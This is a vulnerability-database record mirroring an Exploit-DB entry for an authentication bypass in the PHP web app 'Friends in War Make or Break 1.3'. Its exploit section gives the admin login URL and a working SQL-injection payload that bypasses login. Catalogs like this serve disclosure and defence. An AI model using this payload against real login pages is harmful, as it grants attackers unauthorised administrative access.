Details of VAR-E-201211-0237

ID

VAR-E-201211-0237

EDB ID

22736

TITLE

Friends in War Make or Break 1.3 - Authentication Bypass - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 22736

DESCRIPTION

Friends in War Make or Break 1.3 - Authentication Bypass. CVE-87351 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 22736

AFFECTED PRODUCTS

vendor:

friends

model:

in war make or break

scope:

version:

1.3

Trust: 1.6

sources: EXPLOIT-DB: 22736 // EDBNET: 44916

EXPLOIT

# Exploit Title: friendsinwar Make or break V1.3 SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/make_or_break/admin/login.php
# Tested on: Windows 7
# Blog: d3b4g.me

----------------------------------------------------------------------------------
() SQL Injection :

http://localhost/script_demo/make_or_break/admin/login.php

+ Use following information to bypass login.

User:admin

' or ' 1=1

-end-

Trust: 1.0

sources: EXPLOIT-DB: 22736

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 22736

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 22736

TYPE

Authentication Bypass

Trust: 1.0

sources: EXPLOIT-DB: 22736

CREDITS

d3b4g

Trust: 0.6

sources: EXPLOIT-DB: 22736

EXTERNAL IDS

db:	EXPLOIT-DB	id:	22736	Trust: 1.6
db:	EDBNET	id:	44916	Trust: 0.6

sources: EXPLOIT-DB: 22736 // EDBNET: 44916

REFERENCES

url:

https://www.exploit-db.com/exploits/22736/

Trust: 0.6

sources: EDBNET: 44916

SOURCES

db:	EXPLOIT-DB	id:	22736
db:	EDBNET	id:	44916

LAST UPDATE DATE

2022-07-27T09:45:18.798000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	22736	date:	2012-11-15T00:00:00
db:	EDBNET	id:	44916	date:	2012-11-15T00:00:00